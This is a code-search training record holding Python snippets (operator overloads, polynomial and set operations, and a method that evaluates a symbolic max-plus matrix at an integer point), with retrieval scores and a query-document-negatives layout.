match\")\n\t\ttotalNzero = self.nZero + other.nZero\n\n\t\tDself = np.zeros((2*self.totalBins))\n\t\tDother = np.zeros((2*other.totalBins))\n\t\tZself = np.zeros((2*totalNzero, 2*self.totalBins))\n\t\tZother = np.zeros((2*totalNzero, 2*other.totalBins))\n\t\tfor s in range(self.nSect):\n\t\t\tstartSelf = self.borders[s]\n\t\t\tstartOther = other.borders[s]\n\t\t\tnBins = min(self.borders[s+1] - self.borders[s], other.borders[s+1] - other.borders[s])\n\t\t\tfor i in range(nBins):\n\t\t\t\tdelRe = self.reals[startSelf+i] - other.reals[startOther+i]\n\t\t\t\tdelIm = self.imags[startSelf+i] - other.imags[startOther+i]\n\t\t\t\tDself[2*(startSelf + i) ] = delRe\n\t\t\t\tDself[2*(startSelf + i)+1] = delIm\n\t\t\t\tDother[2*(startOther + i) ] = delRe\n\t\t\t\tDother[2*(startOther + i)+1] = delIm\n\t\t\t\tfor z in range(self.nZero):\n\t\t\t\t\tzeroVal = self.zeroModes[z][startSelf+i]\n\t\t\t\t\tZself[2*z ,2*(startSelf + i) ] = zeroVal\n\t\t\t\t\tZself[2*z+1,2*(startSelf + i)+1 ] = zeroVal\n\t\t\t\t\tZother[2*z ,2*(startOther + i) ] = zeroVal\n\t\t\t\t\tZother[2*z+1,2*(startOther + i)+1] = zeroVal\n\t\t\t\tz0 = self.nZero\n\t\t\t\tfor z in range(other.nZero):\n\t\t\t\t\tzeroVal = -other.zeroModes[z][startOther+i]\n\t\t\t\t\tZself[2*(z+z0) , 2*(startSelf + i) ] = zeroVal\n\t\t\t\t\tZself[2*(z+z0)+1 , 2*(startSelf + i)+1] = zeroVal\n\t\t\t\t\tZother[2*(z+z0) , 2*(startOther+ i) ] = zeroVal\n\t\t\t\t\tZother[2*(z+z0)+1, 2*(startOther+ i)+1] = zeroVal\n\t\tDCself = np.dot(Dself, self.comaInv)\n\t\tDCother = np.dot(Dother, other.comaInv)\n\n\t\tCself = np.dot(Dself, DCself)\n\t\tCother = np.dot(Dother, DCother)\n\t\tBself = np.dot(Zself, DCself)\n\t\tBother = np.dot(Zother, DCother)\n\t\tAself = np.dot(Zself, np.transpose(np.dot(Zself, self.comaInv)))\n\t\tAother = np.dot(Zother, np.transpose(np.dot(Zother, other.comaInv)))\n\t\treturn Aself+Aother, 2*(Bself + Bother), Cself + Cother # A factor 2 was missing inB", "def __xor__(self, other):\n\n if isinstance(other, Dyadic):\n return NotImplemented\n if isinstance(other, (int, type(Zero()))):\n if (other == 0):\n return self * 0\n self._check_vector(other)\n\n def _det(mat):\n \"\"\"This is needed as a little method for to find the determinant\n of a list in python; needs to work for a 3x3 list.\n SymPy's Matrix won't take in Vector, so need a custom function.\n You shouldn't be calling this.\n\n \"\"\"\n\n return (mat[0][0] * (mat[1][1] * mat[2][2] - mat[1][2] * mat[2][1])\n + mat[0][1] * (mat[1][2] * mat[2][0] - mat[1][0] *\n mat[2][2]) + mat[0][2] * (mat[1][0] * mat[2][1] -\n mat[1][1] * mat[2][0]))\n\n outvec = Vector([])\n ar = other.args # For brevity\n for i, v in enumerate(ar):\n tempx = v[1].x\n tempy = v[1].y\n tempz = v[1].z\n tempm = ([[tempx, tempy, tempz], [self & tempx, self & tempy,\n self & tempz], [Vector([ar[i]]) & tempx,\n Vector([ar[i]]) & tempy, Vector([ar[i]]) & tempz]])\n outvec += _det(tempm)\n return outvec", "def smaller(self):\n return [x for x in TransitiveIdeal(attrcall('pred'), [self])]", "def __eq__(self, other):\n\n equalCoordinates = self.getCoordinate() == other.getCoordinate()\n equalMasses = self.getMass() == other.getMass()\n equalVelocities = self.getVelocity() == other.getVelocity()\n equalAccelerations = self.getAcceleration() == other.getAcceleration()\n\n return equalCoordinates & equalMasses & equalVelocities & equalAccelerations", "def __mul__(self, polynomial_2: Polynomial) -> Polynomial:\n coefficients: list[float] = [0] * (self.degree + polynomial_2.degree + 1)\n for i in range(self.degree + 1):\n for j in range(polynomial_2.degree + 1):\n coefficients[i + j] += (\n self.coefficients[i] * polynomial_2.coefficients[j]\n )\n\n return Polynomial(self.degree + polynomial_2.degree, coefficients)", "def atoms(self):\n return itertools.chain(self.rhs_atoms, self.lhs_atoms)", "def __pow__(self, other):\n if other == 2:\n # cartesian product\n new_set = Set()\n for s1 in self:\n for s2 in self:\n new_set += Set(List([[s1, s2]]))\n return new_set\n raise TypeError(\n f\"{other} must be 2 to compute cartesian product of a set with itself\")", "def __add__(self, other):\n sum_ct = ContingencyTable(*(self.table + other.table).tolist())\n return sum_ct", "def __eq__(self, rhs: Union[float, Simpy]) -> list[bool]:\n mask: list[bool] = []\n if isinstance(rhs, float):\n for item in self.values:\n mask.append(item == rhs)\n else:\n assert len(self.values) == len(rhs.values)\n for i in range(len(self.values)):\n mask.append(self.values[i] == rhs.values[i])\n return mask", "def __add__(self, other: 'ModelParameters') -> 'ModelParameters':\n return ModelParameters([self[idx] + other[idx] for idx in range(len(self))])", "def kspace_cholesky_solve_(self, other):\n n_points = np.max(np.array([n_lattice(self), n_lattice(other)]), axis = 0)\n self_k = transform(self, np.fft.fftn, n_points = n_points)\n other_k = transform(other, np.fft.fftn, n_points = n_points)\n\n ret = tmat()\n ret.load_nparray(np.ones((self_k.coords.shape[0],self_k.blockshape[0], other_k.blockshape[1]), dtype = np.complex), self_k.coords, safemode = False)\n #ret = self_k*1.0\n ret.blocks*=0.0\n\n #ret.blocks[:-1] = np.einsum(\"ijk,ikl->ijl\", self_k.blocks[:-1], other_k.blocks[:-1], optimize = True)\n\n for i in np.arange(len(self_k.blocks)-1):\n \n #print(np.max(np.abs(self_k.blocks[i].T-self_k.blocks[i])))\n #assert(np.max(np.abs(self_k.blocks[i].T-self_k.blocks[i]))<1e-10), \"not symmetric\"\n #assert(np.linalg.norm(self_k.blocks[i].T-self_k.blocks[i])<1e-10), \"not symmetric\"\n Mk = np.linalg.cholesky(self_k.blocks[i])\n yk = np.linalg.solve(Mk, other_k.blocks[i])\n\n\n ret.blocks[i] = np.linalg.solve(Mk.conj().T, yk)\n\n ret = transform(ret, np.fft.ifftn, n_points = n_points, complx = False)\n return ret", "def __xor__(self, other):\n if type(other) == Form:\n other = [other]\n return Form.union([other, self])", "def xor(self, t1, t2):\n return [x ^ y for x, y in zip(t1, t2)]", "def __xor__(self, other: Compound[Scalar]) -> Compound[Scalar]:\n return (self._pack_points(self._points_set ^ other._points_set)\n if isinstance(other, Multipoint)\n else NotImplemented)", "def corr_with(self, other):\n return self.data.corrwith(other)", "def __sub__(self, other):\n return Point([c1 - c2 for (c1, c2) in zip(self, other)])", "def jaccard_similarity(iterable1, iterable2):\n t = ConfusionMatrix2.from_sets(iterable1, iterable2)\n return t.jaccard_coeff()", "def coefficients(self):\n if self._coefficients is None:\n return np.hstack([c.coefficients for c in self._traces])\n return self._coefficients", "def common_hypernyms(self, other):\n return set(self.all_hypernyms()).intersection(set(other.all_hypernyms()))", "def __xor__(self, other):\n if not isinstance(other, UniSet):\n other = self.fam.c_uniset(other)\n return self.fam.c_xor(self, other)", "def setdiff(self, other):\n\n return self.intersect(other, op=np.setdiff1d)", "def test_coefficients_two_param_circuits(\n self, circuit, degree, expected_coeffs, use_broadcasting\n ):\n coeffs = coefficients(circuit, circuit.n_inputs, degree, use_broadcasting=use_broadcasting)\n assert np.allclose(coeffs, expected_coeffs)", "def get_coeffs(self):\n\n return self._coeff_to_dict()", "def __mod__(self, other):\n return (self - other) + (other - self)", "def getEquates(self, instruction: ghidra.program.model.listing.Instruction, operandIndex: int) -> List[ghidra.program.model.symbol.Equate]:\n ...", "def __add__( self, other ) :\n\n try :\n other = float( other )\n c_ls = self.copy( )\n for l, c_l in enumerate( c_ls ) : c_ls.coefficients[l] += other\n except :\n self.checkSameSeriesType( other )\n c_l1, c_l2 = self, other\n if( len( self ) < len( other ) ) : c_l1, c_l2 = other, self\n c_ls = c_l1.copy( )\n for l, c_l in enumerate( c_l2 ) : c_ls.coefficients[l] += c_l\n return( c_ls )", "def omega(self):\n return [coset for coset in range(len(self.p)) if self.p[coset] == coset]", "def __xor__(self, other):\r\n if self.field.characteristic == 2:\r\n return runtime.xor(self, other)\r\n\r\n return super().__xor__(other)", "def __listsubseteq(self, c1, c2):\n s2 = {}\n for delta in c2:\n s2[delta] = 1\n\n for delta in c1:\n if not s2.has_key(delta):\n return 0\n\n return 1", "def all_coeffs(f):\n return dmp_all_coeffs(f.rep, f.lev, f.dom)", "def __mul__ (self, other):\n return perm(*(self._getcycles() + other._getcycles()))", "def _dot(self, other):\n if self.num_qubits != other.num_qubits:\n raise QiskitError(\"Multiplication on different number of qubits.\")\n result = CNOTDihedral(num_qubits=self.num_qubits)\n result.shift = [\n (x[0] + x[1]) % 2 for x in zip(self._z2matvecmul(self.linear, other.shift), self.shift)\n ]\n result.linear = self._z2matmul(self.linear, other.linear)\n # Compute x' = B1*x + c1 using the p_j identity\n new_vars = []\n for i in range(self.num_qubits):\n support = np.arange(self.num_qubits)[np.nonzero(other.linear[i])]\n poly = SpecialPolynomial(self.num_qubits)\n poly.set_pj(support)\n if other.shift[i] == 1:\n poly = -1 * poly\n poly.weight_0 = (poly.weight_0 + 1) % 8\n new_vars.append(poly)\n # p' = p1 + p2(x')\n result.poly = other.poly + self.poly.evaluate(new_vars)\n return result", "def __xor__(self, other) -> 'MultiVector':\n\n other, mv = self._checkOther(other, coerce=False)\n\n if mv:\n newValue = self.layout.omt_func(self.value, other.value)\n else:\n if isinstance(other, np.ndarray):\n obj = self.__array__()\n return obj^other\n newValue = other*self.value\n\n return self._newMV(newValue)", "def lowest_common_subsumer(self, other):\n lcs = set()\n if other == self:\n lcs.add(self)\n return lcs\n if other in self._direct_hypernyms or other.is_root():\n lcs.add(other)\n return lcs\n if self in other._direct_hypernyms or self.is_root():\n lcs.add(self)\n return lcs\n common_hypernyms = self.common_hypernyms(other)\n dist_dict1 = self.get_distances_hypernym_dic()\n dist_dict2 = other.get_distances_hypernym_dic()\n dist = math.inf\n for hypernym in common_hypernyms:\n dist1 = dist_dict1[hypernym]\n dist2 = dist_dict2[hypernym]\n if dist1 + dist2 < dist:\n lcs.clear()\n lcs.add(hypernym)\n dist = dist1 + dist2\n if dist1 + dist2 == dist:\n lcs.add(hypernym)\n return lcs", "def similarity_scores(self, other):\n results = []\n\n words_score=compare_dictionaries(other.words, self.words)\n wordl_score=compare_dictionaries(other.word_lengths, self.word_lengths)\n stems_score=compare_dictionaries(other.stems, self.stems)\n sentl_score=compare_dictionaries(other.sentence_lengths, self.sentence_lengths)\n endings_score=compare_dictionaries(other.endings, self.endings)\n results+= [words_score]\n results+= [wordl_score]\n results+= [stems_score]\n results+= [sentl_score]\n results+= [endings_score]\n return results", "def __sub__(self, other):\n n = len(self)\n\n if n != len(other):\n raise(VetorError, \"Vetor dimensions are not equal\")\n\n v = zeros_como(self)\n\n for i in range(n):\n v[i] = self[i] - other[i]\n\n return v", "def get_covariate_pairs(self):\n if self.covariate_field not in self.matrix.obs.columns:\n raise ValueError(\"Covariate value not available in dataset\")\n from itertools import product\n covariate = set(self.matrix.obs[self.covariate_field])\n return product(covariate, covariate)", "def _compose(self, other):\n if self.num_qubits != other.num_qubits:\n raise QiskitError(\"Multiplication on different number of qubits.\")\n result = CNOTDihedral(num_qubits=self.num_qubits)\n result.shift = [\n (x[0] + x[1]) % 2 for x in zip(self._z2matvecmul(other.linear, self.shift), other.shift)\n ]\n result.linear = self._z2matmul(other.linear, self.linear)\n # Compute x' = B1*x + c1 using the p_j identity\n new_vars = []\n for i in range(self.num_qubits):\n support = np.arange(other.num_qubits)[np.nonzero(self.linear[i])]\n poly = SpecialPolynomial(self.num_qubits)\n poly.set_pj(support)\n if self.shift[i] == 1:\n poly = -1 * poly\n poly.weight_0 = (poly.weight_0 + 1) % 8\n new_vars.append(poly)\n # p' = p1 + p2(x')\n result.poly = self.poly + other.poly.evaluate(new_vars)\n return result", "def mix(self, other: \"DiscreteFactorTable\"):\n if (len(self.support) == 0):\n return other\n if (len(other.support) == 0):\n return self\n\n # NOTE: can this be relaxed?\n assert type(self.support[0]) == type(other.support[0])\n\n jsupport = []\n jlogits = []\n matchedrows = []\n unmatchedrows = []\n\n #check that all entries have same keys\n if isinstance(self.support[0], (dict, frozendict)):\n s_keys = tuple(self.support[0].keys())\n for si in self.support:\n assert tuple(si.keys()) == s_keys\n if isinstance(other.support[0], (dict, frozendict)):\n o_keys = tuple(other.support[0].keys())\n for oi in self.support:\n assert tuple(oi.keys()) == o_keys\n\n #first get inner join rows, tracking ones that don't match\n for si, oi in product(self.support, other.support):\n if isinstance(si, (dict, frozendict)) and isinstance(oi, (dict, frozendict)):\n if dict_match(si, oi): #not efficient if the cartesian product is large\n matchedrows.extend([si, oi])\n soi = dict_merge(si, oi)\n if soi in jsupport:\n continue\n jprob = np.exp(self.logit(si)) + np.exp(other.logit(oi))\n jlogit = np.log(jprob)\n\n if jlogit == -np.inf:\n continue\n jsupport.append(soi)\n jlogits.append(jlogit)\n else:\n unmatchedrows.extend([si, oi])\n else:\n soi = (si, oi)\n jprob = np.exp(self.logit(si)) + np.exp(other.logit(oi))\n jlogit = np.log(jprob)\n jsupport.append(soi)\n jlogits.append(jlogit)\n\n #add in the left and right outer join rows, ensuring that they were never matched\n for i in unmatchedrows:\n if (i in matchedrows) or (i in jsupport):\n continue\n logit = np.log(np.exp(self.logit(i)) + np.exp(other.logit(i)))\n if logit == -np.inf:\n continue\n jsupport.append(i)\n jlogits.append(logit)\n return DiscreteFactorTable(support=jsupport, logits=jlogits)", "def __eq__(self, other):\r\n\t\treturn self._to_pylist() == other._to_pylist()", "def difference(self, *other):\n \n new_ordered_set = OrderedSet()\n\n for element in self:\n for obj in other:\n if element in obj:\n break\n else:\n new_ordered_set.add(element)\n\n return new_ordered_set", "def centralizer(self, other):\n if hasattr(other, 'generators'):\n if other.is_trivial or self.is_trivial:\n return self\n degree = self.degree\n identity = _af_new(list(range(degree)))\n orbits = other.orbits()\n num_orbits = len(orbits)\n orbits.sort(key=lambda x: -len(x))\n long_base = []\n orbit_reps = [None]*num_orbits\n orbit_reps_indices = [None]*num_orbits\n orbit_descr = [None]*degree\n for i in range(num_orbits):\n orbit = list(orbits[i])\n orbit_reps[i] = orbit[0]\n orbit_reps_indices[i] = len(long_base)\n for point in orbit:\n orbit_descr[point] = i\n long_base = long_base + orbit\n base, strong_gens = self.schreier_sims_incremental(base=long_base)\n strong_gens_distr = _distribute_gens_by_base(base, strong_gens)\n i = 0\n for i in range(len(base)):\n if strong_gens_distr[i] == [identity]:\n break\n base = base[:i]\n base_len = i\n for j in range(num_orbits):\n if base[base_len - 1] in orbits[j]:\n break\n rel_orbits = orbits[: j + 1]\n num_rel_orbits = len(rel_orbits)\n transversals = [None]*num_rel_orbits\n for j in range(num_rel_orbits):\n rep = orbit_reps[j]\n transversals[j] = dict(\n other.orbit_transversal(rep, pairs=True))\n trivial_test = lambda x: True\n tests = [None]*base_len\n for l in range(base_len):\n if base[l] in orbit_reps:\n tests[l] = trivial_test\n else:\n def test(computed_words, l=l):\n g = computed_words[l]\n rep_orb_index = orbit_descr[base[l]]\n rep = orbit_reps[rep_orb_index]\n im = g._array_form[base[l]]\n im_rep = g._array_form[rep]\n tr_el = transversals[rep_orb_index][base[l]]\n # using the definition of transversal,\n # base[l]^g = rep^(tr_el*g);\n # if g belongs to the centralizer, then\n # base[l]^g = (rep^g)^tr_el\n return im == tr_el._array_form[im_rep]\n tests[l] = test\n\n def prop(g):\n return [rmul(g, gen) for gen in other.generators] == \\\n [rmul(gen, g) for gen in other.generators]\n return self.subgroup_search(prop, base=base,\n strong_gens=strong_gens, tests=tests)\n elif hasattr(other, '__getitem__'):\n gens = list(other)\n return self.centralizer(PermutationGroup(gens))\n elif hasattr(other, 'array_form'):\n return self.centralizer(PermutationGroup([other]))", "def __eq__(self, polynomial_2: object) -> bool:\n if not isinstance(polynomial_2, Polynomial):\n return False\n\n if self.degree != polynomial_2.degree:\n return False\n\n for i in range(self.degree + 1):\n if self.coefficients[i] != polynomial_2.coefficients[i]:\n return False\n\n return True", "def __iadd__(self, other):\n self.components = [c1 + c2 for (c1, c2) in zip(self, other)]\n return self", "def test_coefficients(self):\n\n coefs = self.cs.coefficients\n\n self.assertEqual(coefs, (1, 0, 1, 0, 0, -1))", "def __add__(self, other):\n if (len(self.arg) < len(other.arg)):\n summ = Polynomial(other.arg)\n i = len(self.arg) - 1\n for x in self.arg:\n summ.arg[i] = self.arg[i] + summ.arg[i]\n i = i - 1\n else:\n summ = Polynomial(self.arg)\n i = len(other.arg) - 1\n for x in other.arg:\n summ.arg[i] = other.arg[i] + summ.arg[i]\n i = i - 1\n return summ", "def dot(self, other: 'ModelParameters') -> float:\n param_products = []\n for idx in range(len(self.parameters)):\n param_products.append((self.parameters[idx] * other.parameters[idx]).sum().item())\n return sum(param_products)", "def only_diff_elements(s1, s2):\n\n return set(s1 ^ s2)", "def adjoint(self):\n return self.cofactorMatrix().transpose()", "def symmetric_difference(self, other):\n return SymmetricDifference(self, other)", "def __eq__(self, other):\n return LimitedGoniometer.__eq__(self,other) and \\\n (np.deg2rad(self.chi) == other.chi) and \\\n (np.deg2rad(self.omega) == other.omega)", "def __eq__(self, other):\n return (self.real+(self.imag*1j)) == (other.real+(other.imag*1j))\n #return (Complex(self.real, self.imag) == Complex(other.real, other.imag))", "def __cross(self,A, B):\n return [s+t for s in A for t in B]", "def intersection(self, other):\n new_ieqs = []\n new_ieqs.extend(self.inequalities())\n new_ieqs.extend(other.inequalities())\n\n new_eqns = []\n new_eqns.extend(self.equations())\n new_eqns.extend(other.equations())\n\n return Polyhedron(ieqs = new_ieqs, eqns = new_eqns, \n field=self.coerce_field(other))", "def combinations(self):\n return self._combinations", "def _get_params(self):\r\n return np.hstack((self.k1._get_params(), self.k2._get_params()))", "def _get_params(self):\r\n return np.hstack((self.k1._get_params(), self.k2._get_params()))", "def __eq__(self, other):\n if not isinstance(other, OneOfSolidNumericsSolver):\n return False\n\n return self.to_dict() == other.to_dict()", "def __eq__(self, other):\n return (self.vertices == other.vertices and self.weight == other.weight)", "def __and__(self, other):\n points = self.crossForm(other)\n points += [point for point in self.points if point in other]\n points += [point for point in other.points if point in self]\n if points: return Form(points)", "def __eq__(self, other):\n return np.allclose(self.P, other.P)", "def All(self):\n return Constrains._constrains.copy()", "def __eq__(self, other):\n\n if hasattr(other, 'vector'):\n return self.vector == other.vector", "def get_base_coefs(mv):\n\trs = []\n\tfor bs in bases:\n\t\tt = []\n\t\tfor b in bs:\n\t\t\tt.append(mv.coef(b))\n\t\t\t\t\t\n\t\trs.append(t)\t\t\n\treturn rs", "def union(self, other):\n return PermClass([S_1 + S_2 for S_1, S_2 in zip(self, other)])", "def equivalencies(self):\n if hasattr(self, '_equivalencies'):\n return self._equivalencies\n else:\n return self._default_equivalencies" ]
[ "0.66310555", "0.6198817", "0.61889756", "0.5865301", "0.5818835", "0.5683608", "0.5683608", "0.56740135", "0.5648324", "0.56273437", "0.56273437", "0.5593266", "0.55242145", "0.5514569", "0.546532", "0.5455155", "0.5414487", "0.5409538", "0.5363544", "0.53480685", "0.5334692", "0.53232247", "0.53002703", "0.5292918", "0.52882516", "0.52718186", "0.5233594", "0.5221504", "0.5219258", "0.5215172", "0.51632375", "0.515847", "0.5152764", "0.51506984", "0.5141174", "0.5139557", "0.5118783", "0.51012415", "0.50980574", "0.5096633", "0.5063115", "0.5062866", "0.50571597", "0.5043687", "0.5042229", "0.5040098", "0.50396025", "0.5026579", "0.501017", "0.50096226", "0.50094974", "0.5008803", "0.4993444", "0.4991799", "0.49832505", "0.49819326", "0.49696428", "0.49661624", "0.49544895", "0.49509567", "0.49439642", "0.49437022", "0.4937551", "0.49374145", "0.49257195", "0.49219087", "0.4918385", "0.49071503", "0.4906507", "0.49015427", "0.48845962", "0.48816976", "0.4880299", "0.4878021", "0.487765", "0.4876724", "0.48762232", "0.48742834", "0.4869939", "0.48668262", "0.48641574", "0.48594037", "0.48576808", "0.4856895", "0.48525363", "0.48458672", "0.4843521", "0.48420364", "0.48408514", "0.48391318", "0.48391318", "0.48374033", "0.4830426", "0.48208165", "0.4820636", "0.48106027", "0.4808377", "0.4800521", "0.47976816", "0.47932193" ]
0.78071773
0
r""" String when the object is printed
def _repr_(self): return 'A {}x{} symbolic max plus matrix on {} variables'.format( self.dim(), self.dim(), self.num_vars())
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __str__(self):\n return self.printable()", "def __str__(self):\r\n return repr(self)", "def __str__(self):\n return repr(self)", "def __str__(self):\n return \"<%s: %s>\" % (self.__class__, self.describe())", "def __str__(self):\n return_string = self.name + \"\\n\" + str(self.traits)\n\n return return_string", "def __str__(self):\n # print(self.get_string())\n return self.get_string()", "def __str__(self):\n # print(self.get_string())\n return self.get_string()", "def _printable(self):\n pass", "def __str__(self) -> str:", "def __str__(self) -> str:", "def __str__(self) -> str:", "def __str__(self) -> str:", "def __str__(self):\n return self.__class__.__name__ + '\\n' + self.__class__.__doc__", "def __str__(self):\n debug_str = \"%s ::=\" % str(self.head)\n for symbol in self.body:\n debug_str += \" %s\" % str(symbol)\n return debug_str", "def __str__(self): # pragma: no cover\n return self.display()", "def __repr__(self) -> str:\n\t\treturn \"- {}\\n{}\\n\".format(self.name, self.__str__())", "def __repr__(self) -> str:\n\t\treturn \"\"", "def __str__(self):\r\n to_print = (\"Name: \" + self.name + \", Age: \" +\r\n str(self.age) + \", Hobbys: \" + str(self.hobbys))\r\n return to_print", "def __repr__(self) -> str:\n return '{:s}({!r})'.format(self.__class__.__name__, self.getvalue())", "def __repr__(self) -> str:\n return '{:s}({!r})'.format(self.__class__.__name__, self.getvalue())", "def __repr__(self) -> str:\n return '{:s}({!r})'.format(self.__class__.__name__, self.getvalue())", "def __repr__(self):\n str(self)", "def print(self):\n # Your implementation here", "def __str__(self):\n return str(self.__dict__['_obj'])", "def print_me(self):\n return \"ID: %s Title: %s\" % (self.ID, self.title)", "def __str__(self):\r\n return self.__repr__()", "def __repr__(self) -> str:\n ...", "def __repr__(self) -> str:\n ...", "def __repr__(self) -> str:\n ...", "def __repr__(self) -> str:\n ...", "def __repr__(self) -> str:\n ...", "def __repr__(self):\r\n return str(self)", "def display(self):\n print(str(self))", "def __repr__(self):\r\n\t\treturn str(self)", "def __str__(self):\n\n # Print the class and address.\n msg = \"{0} at {1}\\n\".format(str(self.__class__), str(hex(id(self))))\n\n # Print some other basic information.\n msg = \"{0} line name: ({1})\\n\".format(msg, self.name)\n msg = \"{0} ping_time: ({1})\\n\".format(\n msg,\n self.ping_time.shape[0])\n msg = \"{0} data: ({1})\\n\".format(\n msg,\n self.data.shape[0])\n msg = \"{0} start time: {1}\\n\".format(msg,\n self.ping_time[0])\n msg = \"{0} end time: {1}\\n\" .format(msg,\n self.ping_time[-1])\n\n return msg", "def __str__(self):\n print_info = f\"\\nStudent ID: {self._id}, Name: {self._name}, \" \\\n f\"Year: {self._year} \\nPhone: {str(self._phone)}, \" \\\n f\"Address: {str(self._address)} \" \\\n f\"\\nClasses: {str(self._classes)}\" \\\n f\"\\nBirth Date: {self._date}\"\n return print_info", "def __str__(self):\n str = \"[{}] ({}) {}\"\n return (str.format(self.__class__.__name__, self.id, self.__dict__))", "def _print_custom(self):\n pass", "def __str__(self):\n return \"{}\".format(super().__str__())", "def __str__(self):\n string = super().__str__()\n string += \"\\n\" + str(self.get_dict())\n return string", "def toString(self, indent=\"\"):\n return indent + self.__class__.__name__ + \": { }\"", "def __str__(self):\n if self.__description:\n return self.__description\n return repr(self)", "def __str__(self):\n return self.format()", "def __str__(self):\n return str(self.__s)", "def __str__(self) -> str:\n\t\treturn \"{}{}; {}\".format(TAB, self.get_typestring(force_regen=True), self.get_description())", "def __repr__(self):\n\t\treturn str(self)", "def __repr__(self):\n\t\treturn str(self)", "def __pout__(self):\n return self.__str__()", "def __str__(self):\n\n return '__str__ for Object'", "def toString():", "def __repr__(self):\r\n return self.__str__()", "def __str__(self):\n print_string = 'key: {} | value: {}'.format(\n str(self.key), str(self.value)\n )\n return print_string", "def debug_string(self):\n\n raise NotImplementedError", "def __str__(self):\r\n return Assert(self.obj.__str__())", "def __str__(self):\n return str(self.obj)", "def __str__(self):\n return self.__repr__()", "def __str__(self):\n return self.__repr__()", "def __str__(self):\n return self.__repr__()", "def __str__(self):\n return self.__repr__()", "def __str__(self):\n return self.__repr__()", "def __repr__(self) -> str:\n return self.__str__()", "def __repr__(self) -> str:\n return self.__str__()", "def __repr__(self) -> str:\n return self.__str__()", "def __repr__(self) -> str:\n return self.__str__()", "def repr_(object_):\n return repr(object_)", "def __str__(self):\n to_print = '{} : {}\\n'.format('Name'.ljust(34),self.name)\n to_print = to_print + '{} : {}\\n'.format('Name'.ljust(34),self.pathloss.name)\n to_print = to_print + '{} : {}\\n'.format('Number of samples'.ljust(34),self.nsamples)\n to_print = to_print + '{} : {}\\n'.format('Sensor model'.ljust(34),self.sensor_model.name)\n to_print = to_print + '{} : {}\\n'.format('Motion model'.ljust(34),self.motion_model.name)\n return to_print", "def __repr__(self):\n return str(self)", "def __repr__(self):\n return str(self)", "def __repr__(self):\n return str(self)", "def __repr__(self):\n return str(self)", "def __repr__(self):\n return str(self)", "def __repr__(self):\n return str(self)", "def __repr__(self):\n return str(self)", "def __repr__(self):\n return str(self)", "def __repr__(self):\n return str(self)", "def __repr__(self):\n return str(self)", "def __repr__(self):\n return str(self)", "def __repr__(self):\n return str(self)", "def __repr__(self):\n return str(self)", "def __str__(self):\n\n\t\toutput = MyUtilities.common.Container.__str__(self)\n\t\tif (self.thing is not None):\n\t\t\toutput += f\"-- Title: {self.title}\\n\"\n\t\treturn output", "def __str__(self):\n return f\"<{full_class_name(self)} {self.name!r} @{'%x' % id(self)}>\"", "def display(self):\n print(self)", "def __str__(self):\n return '{}({})'.format(type(self).__name__, self.__name)", "def __str__(self):\n return str(self.__dict__)", "def __str__(self):\n return str(self.__dict__)", "def __repr__(self):\n return self.__str__()", "def __repr__(self):\n return self.__str__()", "def __repr__(self):\n return self.__str__()", "def __repr__(self):\n return self.__str__()", "def __repr__(self):\n return self.__str__()", "def __repr__(self):\n return self.__str__()", "def __repr__(self):\n return self.__str__()", "def __repr__(self):\n return self.__str__()", "def __repr__(self):\n return self.__str__()", "def __repr__(self):\n return self.__str__()", "def __repr__(self):\n return self.__str__()", "def __repr__(self):\n return self.__str__()", "def __repr__(self):\n return self.__str__()", "def __repr__(self):\n return self.__str__()", "def __repr__(self):\n return self.__str__()", "def __repr__(self):\n return self.__str__()" ]
[ "0.8097469", "0.78782415", "0.77841264", "0.7769064", "0.7669302", "0.76466906", "0.76466906", "0.7623327", "0.75980204", "0.75980204", "0.75980204", "0.75980204", "0.7578883", "0.7571893", "0.75686365", "0.75658494", "0.7563032", "0.7543171", "0.7536491", "0.7536491", "0.7536491", "0.75335777", "0.7533551", "0.75238943", "0.7519295", "0.75015163", "0.74921685", "0.74921685", "0.74921685", "0.74921685", "0.74921685", "0.7491741", "0.74778247", "0.74673915", "0.74646866", "0.746028", "0.7448336", "0.74404454", "0.7432172", "0.74287134", "0.74286175", "0.7415816", "0.7414046", "0.74117905", "0.7407612", "0.740644", "0.740644", "0.74050784", "0.73949355", "0.73907", "0.73903054", "0.7385912", "0.73768544", "0.737641", "0.737323", "0.7372543", "0.7372543", "0.7372543", "0.7372543", "0.7372543", "0.7372", "0.7372", "0.7372", "0.7372", "0.7357865", "0.7352673", "0.734744", "0.734744", "0.734744", "0.734744", "0.734744", "0.734744", "0.734744", "0.734744", "0.734744", "0.734744", "0.734744", "0.734744", "0.734744", "0.7347109", "0.73441124", "0.73388463", "0.73385465", "0.7324787", "0.7324787", "0.731329", "0.731329", "0.731329", "0.731329", "0.731329", "0.731329", "0.731329", "0.731329", "0.731329", "0.731329", "0.731329", "0.731329", "0.731329", "0.731329", "0.731329", "0.731329" ]
0.0
-1
r""" Evaluates this symbolic matrix at the integer point ``p``.
def eval(self, p): from max_plus.max_plus_int import minus_infinity, IntegerMaxPlusMatrix F = FreeModule(ZZ, self._nvars) p = F(p) mat = [] d = self.dim() for i in range(d): row = [] for j in range(d): pts = self[i,j] row.append(minus_infinity() if not pts else max(p.dot_product(v) for v in pts)) mat.append(row) return IntegerMaxPlusMatrix(self._d, self._d, mat)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def evaluate(self,p):\n if not self.initialized: self.__initialize__()\n if self.vp0: p_ = 1-p\n else: p_ = p\n if self.ids_to_consider is None:\n #sum on all parametrized cell\n cf = np.sum(self.V[self.p_ids-1]*p_)/self.V_tot - self.max_v_frac\n else:\n cf = np.sum((self.V[self.ids_to_consider-1]*p_))/self.V_tot - self.max_v_frac\n return cf", "def eval_poly(self, p):\n A = self\n m, n = A.shape\n\n if m != n:\n raise DMNonSquareMatrixError(\"Matrix must be square\")\n\n if not p:\n return self.zeros(self.shape, self.domain)\n elif len(p) == 1:\n return p[0] * self.eye(self.shape, self.domain)\n\n # Evaluate p(A) using Horner's method:\n # XXX: Use Paterson-Stockmeyer method?\n I = A.eye(A.shape, A.domain)\n p_A = p[0] * I\n for pi in p[1:]:\n p_A = A*p_A + pi*I\n\n return p_A", "def matrix_simmetric_representate(self, p):\r\n if (p >0 and (p <= self.dimension()) ):\r\n v = self.basis_group_oriented_p_chains(p)\r\n p = p - 1\r\n ve = self.basis_group_oriented_p_chains(p)\r\n M = csr_matrix((len(ve.dic), len(v.dic)), dtype=np.int8).toarray()\r\n j = 0\r\n for u1 in list(v.dic.keys()):\r\n d = P_chains([u1],[v.dic[u1]])\r\n l = 